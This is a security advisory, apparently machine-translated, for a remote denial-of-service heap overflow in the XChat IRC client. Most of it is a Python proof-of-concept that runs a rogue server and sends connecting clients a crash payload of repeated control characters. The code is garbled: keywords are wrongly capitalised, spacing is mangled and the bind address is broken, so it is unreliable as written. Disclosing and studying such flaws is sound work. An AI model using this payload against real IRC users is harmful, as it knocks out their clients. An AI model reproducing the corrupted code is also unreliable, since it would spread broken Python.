Release date: 2011-11-25
Updated on: 2011-11-29
Affected Systems:
XChat 2.8.9
XChat 2.8.7b
XChat 2.8.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50820
X-Chat is a free open-source IRC client.
X-Chat has a remote denial-of-service vulnerability. Remote attackers can exploit this vulnerability to crash applications and cause denial-of-service (DoS) attacks.
<* Source: th3p4tri0t
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/python
# Exploit Title: XChat Heap Overflow DoS Proof of Concept
# Date: June 2011
# Author: th3p4tri0t
# Software Link: http://xchat.org/
# Version: <= 2.8.9
# This only works on XChat on KDE, I'm not sure about windows.
# It has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5
# It is a heap overflow and is some sort of error with X Windows
# It uses 1537 (this is the minimum) of the ascii value 20
# After this, an unknown number of any other character (did not check for special
# Characters) is required to trigger a crash, presumably the payload will go here.
# Th3p4tri0t
Import socket
Print "XChat PoC Exploit by th3p4tri0t \ n"
Print "Creating server ..."
Sock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print "[*] Binding to socket ..."
Sock. bind ('2017. 0.0.1 ', 127 ))
Print "[*] Listening on socket ..."
Sock. listen (5)
Print "[*] Accepting connection ..."
(Target, address) = sock. accept ()
Print "[*] Sending payload ..."
Buffer = "hybrid7.debian. local"
Buffer + = chr (20) * 1537 # minimum required of this character
Buffer + = "A" * 4000 # anything can go here and it still works.
Buffer + = ": * \ r \ n"
Target. send (buffer)
Target. close
Sock. close
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
XChat
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://xchat.org/